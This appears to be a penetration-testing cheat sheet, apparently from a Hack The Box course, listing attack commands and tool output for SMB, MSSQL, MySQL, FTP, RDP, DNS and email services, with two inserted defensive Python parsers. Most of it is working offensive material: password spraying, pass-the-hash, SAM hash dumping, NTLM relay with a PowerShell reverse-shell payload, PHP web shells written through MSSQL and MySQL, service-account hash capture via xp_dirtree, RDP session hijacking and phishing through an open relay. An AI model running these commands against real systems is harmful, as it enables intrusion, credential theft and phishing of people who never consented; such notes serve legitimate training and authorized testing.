SMB

TCP 445 carries SMB directly over TCP/IP (typical of SMBv2 and SMBv3)

TCP/UDP 137-139 carry SMB over NetBIOS (usually SMBv1)

Interact

Run dialog | Explorer address bar

\\192.168.220.129\share\

cmd | powershell

C:\> dir \\192.168.220.129\share\
PS C:\> Get-ChildItem \\192.168.220.129\share\

Mount SMB - CMD

# connect to the file share and map its contents to drive letter n
C:\> net use n: \\192.168.220.129\share [/user:uname passwd]

# count the files
C:\> dir n: /a-d /s /b | find /c ":\"

# search for specific files
C:\> dir n:\*cred* /s /b
# or search file contents
C:\> findstr /s /i cred n:\*.*

Mount SMB - PowerShell

PS C:\> New-PSDrive -Name "N" -Root "\\192.168.220.129\share" -PSProvider "FileSystem"

# supply credentials
PS C:\> $username = 'uname'
PS C:\> $password = 'passwd'
PS C:\> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\> New-PSDrive -Name "N" -Root "\\192.168.220.129\share" -PSProvider "FileSystem" -Credential $cred

# switch to the drive
PS C:\> N:

# count the files (gci is the alias of Get-ChildItem)
PS N:\> (Get-ChildItem -File -Recurse | Measure-Object).Count
29302

# search for specific files
PS N:\> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

# search file contents
PS C:\> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List

Mount SMB - Linux

$ sudo mkdir /mnt/Finance
$ sudo mount -t cifs //192.168.220.129/share /mnt/Finance -o username=uname,password=passwd,domain=.

# use a credentials file instead of passing the password on the command line
$ sudo mount -t cifs //192.168.220.129/share /mnt/Finance -o credentials=/path/credentialfile

# search for files by name
$ find /mnt/Finance/ -name "*cred*"

# search file contents
$ grep -rn /mnt/Finance/ -ie cred

Credentials file format

username=uname
password=passwd
domain=.

External

nmap

$ sudo nmap 10.129.14.128 -sV -sC -p139,445

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 15:15 CEST
Nmap scan report for 10.129.14.128
Host is up (0.00024s latency).

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 00:00:00:00:00:00 (VMware)

Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-19T13:16:04
|_ start_date: N/A
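An added check, not part of the original notes, that reads `nmap -sC` output like the block above and reports per host whether SMB signing is enforced; the sample output is constructed. The "enabled but not required" result seen here is the setting that lets an unsigned session be relayed, so it is the one a defender should flag and fix via policy.

```python
import re
from typing import Dict, List

# Constructed sample in the style of the nmap -sC output above (two hosts).
SAMPLE_NMAP = """\
Nmap scan report for 10.129.14.128
Host is up (0.00024s latency).
Host script results:
|_nbstat: NetBIOS name: HTB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required

Nmap scan report for 10.129.14.129
Host is up (0.00031s latency).
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
DIALECT_RE = re.compile(r"^\|\s+(\d+\.\d+(?:\.\d+)?):\s*$", re.M)
SIGNING_RE = re.compile(r"^\|_?\s+Message signing (.+?)\s*$", re.M)


def parse_smb_signing(nmap_output: str) -> List[Dict[str, str]]:
    """One finding per scanned host: negotiated dialect, signing text, verdict."""
    findings = []
    # re.split with a capturing group yields [preamble, host1, body1, host2, body2, ...]
    chunks = HOST_RE.split(nmap_output)[1:]
    for host, body in zip(chunks[0::2], chunks[1::2]):
        parts = body.split("smb2-security-mode:", 1)
        if len(parts) < 2:
            findings.append({"host": host, "dialect": "", "signing": "unknown",
                             "verdict": "no smb2-security-mode result"})
            continue
        dialect = DIALECT_RE.search(parts[1])
        signing = SIGNING_RE.search(parts[1])
        text = signing.group(1) if signing else "unknown"
        if text == "enabled and required":
            verdict = "ok: signing enforced"
        elif text == "enabled but not required":
            verdict = "weak: unsigned sessions accepted, NTLM relay possible"
        elif "disabled" in text:
            verdict = "weak: signing disabled"
        else:
            verdict = "unknown"
        findings.append({"host": host, "dialect": dialect.group(1) if dialect else "",
                         "signing": text, "verdict": verdict})
    return findings


def hosts_to_fix(nmap_output: str) -> List[str]:
    """Hosts where SMB signing should be made mandatory by policy."""
    return [f["host"] for f in parse_smb_signing(nmap_output) if f["verdict"].startswith("weak")]


if __name__ == "__main__":
    for f in parse_smb_signing(SAMPLE_NMAP):
        print(f"{f['host']:16} SMB {f['dialect']:6} {f['verdict']}")
```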

null session

smbclient -N -L //10.129.14.128

# list the permissions of every share
smbmap -H 10.129.14.128
# -r [path]                           list all files in the shares, or only under the given share path
# --download "notes\note.txt"         download a file
# --upload test.txt "notes\test.txt"  upload a file

rpc

$ rpcclient -U'%' 10.10.110.17
rpcclient $> enumdomusers

./enum4linux-ng.py 10.10.11.45 -A -C

crack

hydra -L users.list -P pws.list smb://10.129.220.123

spraying

$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
# --continue-on-success  keep spraying after a valid password is found
# --local-auth           authenticate locally (for hosts not joined to a domain)

Internal

PsExec

impacket-psexec administrator:'Password123!'@10.10.110.17

CrackMapExec

# if --exec-method is not defined, CrackMapExec tries atexec
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

# enumerate logged-on users on every machine in the network
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

# dump hashes from the SAM database
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

# pass the hash (PtH)
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Responder

# network poisoning
sudo responder -I <interface name>

If we cannot crack the hash, we can relay the captured hash to another machine with impacket-ntlmrelayx or Responder's MultiRelay.py.

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

# reverse shell: PowerShell #3 (Base64)
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <SNIP>'

MSSQL

TCP 1433 UDP 1434 | “hidden” TCP 2433

MSSQL default system schemas/databases:

  • master - holds information about the SQL Server instance.
  • msdb - used by SQL Server Agent.
  • model - a template database copied for every new database.
  • resource - a read-only database that makes the system objects visible in the sys schema of every database on the server.
  • tempdb - holds temporary objects for SQL queries.

interact

If we do not specify a domain or hostname, the client assumes SQL authentication and authenticates against users created in SQL Server. If we do specify a domain or hostname (SERVERNAME\accountname or .\accountname), it uses Windows authentication.

# Linux - sqsh
sqsh -S 10.129.20.13 -U username -P Password

# Windows - sqlcmd
C:\> sqlcmd -S 10.129.20.13 -U username -P Password123
# sqlcmd needs GO after a query to execute the SQL statement.

nmap

$ nmap -Pn -sV -sC -p1433 10.10.10.125

Host discovery disabled (-Pn). All addresses will be marked 'up', and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-26 02:09 BST
Nmap scan report for 10.10.10.125
Host is up (0.0099s latency).

PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: mssql-test
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: mssql-test.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-08-26T01:04:36
|_Not valid after: 2051-08-26T01:04:36
|_ssl-date: 2021-08-26T01:11:58+00:00; +2m05s from scanner time.

Host script results:
|_clock-skew: mean: 2m04s, deviation: 0s, median: 2m04s
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433

exec

# command execution after connecting to the database; requires privileges, and xp_cmdshell is disabled by default
xp_cmdshell 'whoami'

# enable it (requires privileges)
-- To allow advanced options to be changed.
EXECUTE sp_configure 'show advanced options', 1
GO

-- To update the currently configured value for advanced options.
RECONFIGURE
GO

-- To enable the feature.
EXECUTE sp_configure 'xp_cmdshell', 1
GO

-- To update the currently configured value for this feature.
RECONFIGURE
GO

write

# enable Ole Automation Procedures (requires admin privileges)
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

# create a file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

read

By default, MSSQL allows reading any file on the operating system that the service account has read permission on.

1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO

Capture Hash

The MSSQL service account hash can be stolen with the undocumented stored procedures xp_subdirs or xp_dirtree, which use the SMB protocol to retrieve the list of child directories under a specified parent directory on the file system. When one of these procedures is pointed at our SMB server, the directory listing forces the server to authenticate and send the NTLMv2 hash of the service account running SQL Server.

First start Responder or impacket-smbserver

sudo responder -I tun0

sudo impacket-smbserver share ./ -smb2support

Then run the xp_dirtree or xp_subdirs query

1> EXEC master..xp_dirtree '\\10.10.110.17\share\'
2> GO

# or

1> EXEC master..xp_subdirs '\\10.10.110.17\share\'
2> GO

Impersonating existing users

SQL Server has a special permission named IMPERSONATE that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.

Note: it is recommended to run EXECUTE AS LOGIN in the master database, because by default all users have access to that database. If the user you are trying to impersonate has no access to the database you are connected to, an error is returned.

# list the logins that can be impersonated
1> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
2> GO
name
-----------------------------------------------
sa
ben
valentin


# check whether the current user has the sysadmin role; 0 means it does not
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> GO

-----------
julio
(1 rows affected)

-----------
0

(1 rows affected)


# impersonate the sa login
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

-----------
sa

(1 rows affected)

-----------
1

(1 rows affected)


# revert and return to the previous user
REVERT

Linked servers

MSSQL has a configuration option called linked servers. Linked servers are typically configured to let the database engine execute Transact-SQL statements that include tables in another SQL Server instance or another database product (such as Oracle).

# list linked servers
1> SELECT srvname, isremote FROM sysservers
2> GO

srvname                             isremote
----------------------------------- --------
DESKTOP-MFERMN4\SQLEXPRESS          1
10.0.0.12\SQLEXPRESS                0

(2 rows affected)


# check which login the link uses and what privileges it has
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO

------------------------------ ------------------------------ ------------------------------ -----------
DESKTOP-0L9D4KA\SQLEXPRESS     Microsoft SQL Server 2019 (RTM sa_remote                      1

(1 rows affected)


# read a file through the linked server
1> EXECUTE('select * from OPENROWSET(BULK ''C:/Users/Administrator/desktop/flag.txt'', SINGLE_CLOB) AS Contents') at [local.test.linked.srv];
2> GO

MySQL

TCP 3306

MySQL default system schemas/databases:

  • mysql - the system database, containing the tables that store the information the MySQL server needs
  • information_schema - provides access to database metadata
  • performance_schema - a feature for monitoring MySQL server execution at a low level
  • sys - a set of objects that help DBAs and developers interpret the data collected by the performance schema

interact

# Linux - mysql
mysql -u username -pPassword -h 10.129.20.13

# Windows - mysql.exe
C:\> mysql.exe -u username -pPassword -h 10.129.20.13

nmap

nmap -Pn -sV -sC -p3306 10.10.10.125

write

mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

# prerequisite: secure_file_priv must permit writing to that path
mysql> show variables like "secure_file_priv";

read

mysql> select LOAD_FILE("/etc/passwd");

FTP

TCP 20 TCP 21

interact

ftp anonymous@10.129.20.13

# download all files
wget -m --no-passive ftp://anonymous@10.129.200.209:30021

nmap

$ sudo nmap -sC -sV -p 21 192.168.2.142 

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-10 22:04 EDT
Nmap scan report for 192.168.2.142
Host is up (0.00054s latency).

PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1170 924 31 Mar 28 2001 .banner
| d--x--x--x 2 root root 1024 Jan 14 2002 bin
| d--x--x--x 2 root root 1024 Aug 10 1999 etc
| drwxr-srwt 2 1170 924 2048 Jul 19 18:48 incoming [NSE: writeable]
| d--x--x--x 2 root root 1024 Jan 14 2002 lib
| drwxr-sr-x 2 1170 924 1024 Aug 5 2004 pub
|_Only 6 shown. Use --script-args ftp-anon.maxlist=-1 to see all.

anonymous

$ ftp anonymous@192.168.2.142

crack

hydra -L users.list -P pws.list ftp://10.129.220.123

medusa -M ftp -h 10.129.203.7 -u fiona -P /usr/share/wordlists/rockyou.txt

FTP bounce attack

Suppose our target is the FTP_DMZ server, which is exposed to the Internet. Another device on the same network, Internal_DMZ, is not exposed to the Internet. We can use our connection to the FTP_DMZ server to scan Internal_DMZ with an FTP bounce attack and obtain information about that server's open ports.

Modern FTP servers include protections against this attack by default, but if those features are misconfigured, the server may still be vulnerable to an FTP bounce attack.

$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:password@10.10.110.213:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.

PORT STATE SERVICE
80/tcp open http

<SNIP>

RDP

TCP/UDP 3389

interact

$ rdesktop -u admin -p password123 192.168.2.143

$ xfreerdp /v:192.168.2.143 /u:admin /p:password123
$ xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9

nmap

$ nmap -Pn -p3389 192.168.2.143 

Host discovery disabled (-Pn). All addresses will be marked 'up', and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 04:20 BST
Nmap scan report for 192.168.2.143
Host is up (0.00037s latency).

PORT STATE SERVICE
3389/tcp open ms-wbt-server

spraying

hydra -L user.txt -p 'password123' rdp://<target IP>
# or
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

Session hijacking

Requires SYSTEM privileges and uses the Microsoft tscon.exe binary.

C:\> query user

 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>juurena               rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
 lewen                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM


# tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
# create a Windows service that runs as Local System and executes any binary with SYSTEM privileges
C:\> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
C:\> net start sessionhijack

Note: this method no longer works on Server 2019.

PassTheHash (PtH)

Restricted Admin Mode is disabled by default; it must be enabled on the target host, otherwise the connection fails with an error.

It can be enabled by adding a new registry value DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa:

C:\> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Connect

xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9

DNS

TCP 53 UDP 53

nmap

$ nmap -p53 -Pn -sV -sC 10.10.110.213

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 03:47 EDT
Nmap scan report for 10.10.110.213
Host is up (0.017s latency).

PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)

subdomain

gobuster vhost -u http://example.htb --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# or

ffuf -w /path/to/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://example.htb -H 'Host: FUZZ.example.htb'

DNS zone transfer

A DNS zone is a portion of the DNS namespace managed by a specific organization or administrator. Since DNS comprises many zones, DNS servers use zone transfers to copy part of their database to another DNS server. Unless the DNS server is configured correctly (restricting which IPs may perform a zone transfer), anyone can ask the server for a copy of its zone data, because a zone transfer requires no authentication. DNS normally runs over UDP; zone transfers, however, use TCP for reliable data transfer.

An attacker can use this zone transfer weakness to learn more about the target organization's DNS namespace and thereby enlarge the attack surface.

$ dig AXFR @ns1.inlanefreight.htb inlanefreight.htb

; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefrieght.htb @10.129.110.213
;; global options: +cmd
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
inlanefrieght.htb. 604800 IN AAAA ::1
inlanefrieght.htb. 604800 IN NS localhost.
inlanefrieght.htb. 604800 IN A 10.129.110.22
admin.inlanefrieght.htb. 604800 IN A 10.129.110.21
hr.inlanefrieght.htb. 604800 IN A 10.129.110.25
support.inlanefrieght.htb. 604800 IN A 10.129.110.28
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.129.110.213#53(10.129.110.213)
;; WHEN: Mon Oct 11 17:20:13 EDT 2020
;; XFR size: 8 records (messages 1, bytes 289)
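An added example, not from the original notes, that parses the text output of a `dig AXFR` query (the sample is constructed, modelled on the transfer above) to decide whether the transfer was allowed and which hostnames the zone hands out. A correctly restricted server answers "Transfer failed." and yields no records, which is what an administrator auditing their own name servers wants to see.

```python
from dataclasses import dataclass
from typing import List

# Constructed sample modelled on the successful dig AXFR output shown above.
AXFR_OK = """\
; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefreight.htb @10.129.110.213
;; global options: +cmd
inlanefreight.htb.\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
inlanefreight.htb.\t604800\tIN\tNS\tlocalhost.
inlanefreight.htb.\t604800\tIN\tA\t10.129.110.22
admin.inlanefreight.htb.\t604800\tIN\tA\t10.129.110.21
hr.inlanefreight.htb.\t604800\tIN\tA\t10.129.110.25
inlanefreight.htb.\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
;; XFR size: 6 records (messages 1, bytes 250)
"""
# What a server with allow-transfer restricted to its secondaries answers.
AXFR_REFUSED = """\
; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefreight.htb @10.129.110.213
;; global options: +cmd
; Transfer failed.
"""


@dataclass
class Record:
    name: str
    ttl: int
    rtype: str
    rdata: str


def parse_axfr(dig_output: str) -> List[Record]:
    """Parse resource record lines; dig's ';' comment lines are skipped."""
    records = []
    for line in dig_output.splitlines():
        if not line or line.startswith(";"):
            continue
        fields = line.split(None, 4)  # name ttl class type rdata
        if len(fields) < 5 or fields[2] != "IN":
            continue
        records.append(Record(fields[0], int(fields[1]), fields[3], fields[4]))
    return records


def transfer_allowed(dig_output: str) -> bool:
    """A complete AXFR starts and ends with the zone's SOA record."""
    recs = parse_axfr(dig_output)
    return len(recs) >= 2 and recs[0].rtype == "SOA" and recs[-1].rtype == "SOA"


def exposed_hosts(dig_output: str) -> List[str]:
    """Hostnames with A/AAAA records that a leaked zone would hand to anyone."""
    return sorted({r.name.rstrip(".") for r in parse_axfr(dig_output)
                   if r.rtype in ("A", "AAAA")})


if __name__ == "__main__":
    for label, out in (("open", AXFR_OK), ("restricted", AXFR_REFUSED)):
        print(label, "transfer allowed:", transfer_allowed(out), exposed_hosts(out))
```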

Enumerate all DNS servers of the root domain and check each for zone transfers

$ fierce --domain zonetransfer.me

NS: nsztm2.digi.ninja. nsztm1.digi.ninja.
SOA: nsztm1.digi.ninja. (81.4.108.41)
Zone: success
{<DNS name @>: '@ 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 '
'172800 900 1209600 3600\n'
'@ 300 IN HINFO "Casio fx-700G" "Windows XP"\n'
'@ 301 IN TXT '
'"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA"\n'
'@ 7200 IN MX 0 ASPMX.L.GOOGLE.COM.\n'
'@ 7200 IN MX 10 ALT1.ASPMX.L.GOOGLE.COM.\n'
'@ 7200 IN MX 10 ALT2.ASPMX.L.GOOGLE.COM.\n'
'@ 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM.\n'
'@ 7200 IN MX 20 ASPMX3.GOOGLEMAIL.COM.\n'
'@ 7200 IN MX 20 ASPMX4.GOOGLEMAIL.COM.\n'
'@ 7200 IN MX 20 ASPMX5.GOOGLEMAIL.COM.\n'
'@ 7200 IN A 5.196.105.14\n'
'@ 7200 IN NS nsztm1.digi.ninja.\n'
'@ 7200 IN NS nsztm2.digi.ninja.',
<DNS name _acme-challenge>: '_acme-challenge 301 IN TXT '
'"6Oa05hbUJ9xSsvYy7pApQvwCUSSGgxvrbdizjePEsZI"',
<DNS name _sip._tcp>: '_sip._tcp 14000 IN SRV 0 0 5060 www',
<DNS name 14.105.196.5.IN-ADDR.ARPA>: '14.105.196.5.IN-ADDR.ARPA 7200 IN PTR '
'www',
<DNS name asfdbauthdns>: 'asfdbauthdns 7900 IN AFSDB 1 asfdbbox',
<DNS name asfdbbox>: 'asfdbbox 7200 IN A 127.0.0.1',
<DNS name asfdbvolume>: 'asfdbvolume 7800 IN AFSDB 1 asfdbbox',
<DNS name canberra-office>: 'canberra-office 7200 IN A 202.14.81.230',
<DNS name cmdexec>: 'cmdexec 300 IN TXT "; ls"',
<DNS name contact>: 'contact 2592000 IN TXT "Remember to call or email Pippa '
'on +44 123 4567890 or pippa@zonetransfer.me when making '
'DNS changes"',
<DNS name dc-office>: 'dc-office 7200 IN A 143.228.181.132',
<DNS name deadbeef>: 'deadbeef 7201 IN AAAA dead:beaf::',
<DNS name dr>: 'dr 300 IN LOC 53 20 56.558 N 1 38 33.526 W 0.00m',
<DNS name DZC>: 'DZC 7200 IN TXT "AbCdEfG"',
<DNS name email>: 'email 2222 IN NAPTR 1 1 "P" "E2U+email" "" '
'email.zonetransfer.me\n'
'email 7200 IN A 74.125.206.26',
<DNS name Hello>: 'Hello 7200 IN TXT "Hi to Josh and all his class"',
<DNS name home>: 'home 7200 IN A 127.0.0.1',
<DNS name Info>: 'Info 7200 IN TXT "ZoneTransfer.me service provided by Robin '
'Wood - robin@digi.ninja. See '
'http://digi.ninja/projects/zonetransferme.php for more '
'information."',
<DNS name internal>: 'internal 300 IN NS intns1\ninternal 300 IN NS intns2',
<DNS name intns1>: 'intns1 300 IN A 81.4.108.41',
<DNS name intns2>: 'intns2 300 IN A 167.88.42.94',
<DNS name office>: 'office 7200 IN A 4.23.39.254',
<DNS name ipv6actnow.org>: 'ipv6actnow.org 7200 IN AAAA '
'2001:67c:2e8:11::c100:1332',
...SNIP...

There is also DNS spoofing …


Email

Identify the mail server

$ host -t MX hackthebox.eu
hackthebox.eu mail is handled by 1 aspmx.l.google.com.

$ dig mx inlanefreight.com | grep "MX" | grep -v ";"
inlanefreight.com. 300 IN MX 10 mail1.inlanefreight.com.

$ host -t A mail1.inlanefreight.htb.
mail1.inlanefreight.htb has address 10.129.14.128

If the target runs its own mail server, the following ports can be enumerated:

Port     Service
TCP/25   SMTP   unencrypted
TCP/143  IMAP4  unencrypted
TCP/110  POP3   unencrypted
TCP/465  SMTP   encrypted
TCP/587  SMTP   encrypted / TLS
TCP/993  IMAP4  encrypted
TCP/995  POP3   encrypted

nmap

$ sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-27 17:56 CEST
Nmap scan report for 10.129.14.128
Host is up (0.00025s latency).

PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: mail1.inlanefreight.htb, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
MAC Address: 00:00:00:00:00:00 (VMware)

telnet

Enumerate valid usernames with VRFY, EXPN, RCPT TO, or USER

$ telnet 10.10.110.20 25

# VRFY asks the receiving SMTP server to check whether a specific mailbox name is valid.
VRFY root
252 2.0.0 root

VRFY new-user
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table

# EXPN is similar to VRFY, except that when used with a distribution list it lists every member of that list.
EXPN john
250 2.1.0 john@inlanefreight.htb

EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb

# RCPT TO identifies the recipient of a message. It can be repeated for a single message to deliver it to multiple recipients.
MAIL FROM:test@htb.com
it is
250 2.1.0 test@htb.com... Sender ok

RCPT TO:kate
550 5.1.1 kate... User unknown

RCPT TO:john
250 2.1.5 john... Recipient ok

# POP3 can also be used to enumerate users, depending on the service implementation.
$ telnet 10.10.110.20 110

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
+OK POP3 Server ready

USER julio

-ERR

USER john

+OK

smtp-user-enum

smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

cloud

O365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365).

python3 o365spray.py --validate --domain msplaintext.xyz

python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz

spraying

hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3

python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

Open Relay

An open relay is a Simple Mail Transfer Protocol (SMTP) server that is misconfigured to relay email without authentication. It is abused for phishing: sending email as non-existent users or spoofing someone else's address.

$ nmap -p25 -Pn --script smtp-open-relay 10.10.11.213

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-28 23:59 EDT
Nmap scan report for 10.10.11.213
Host is up (0.28s latency).

PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (14/16 tests)

Next, any mail client can be used to connect to the mail server and send the email.

$ swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213

=== Trying 10.10.11.213:25...
=== Connected to 10.10.11.213.
<- 220 mail.localdomain SMTP Mailer ready
-> EHLO parrot
<- 250-mail.localdomain
<- 250-SIZE 33554432
<- 250-8BITMIME
<- 250-STARTTLS
<- 250-AUTH LOGIN PLAIN CRAM-MD5 CRAM-SHA1
<- 250 HELP
-> MAIL FROM:<notifications@inlanefreight.com>
<- 250 OK
-> RCPT TO:<employees@inlanefreight.com>
<- 250 OK
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Thu, 29 Oct 2020 01:36:06 -0400
-> To: employees@inlanefreight.com
-> From: notifications@inlanefreight.com
-> Subject: Company Notification
-> Message-Id: <20201029013606.775675@parrot>
-> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
->
-> Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/
->
->
-> .
<- 250 OK
-> QUIT
<- 221 Bye
=== Connection closed with remote host.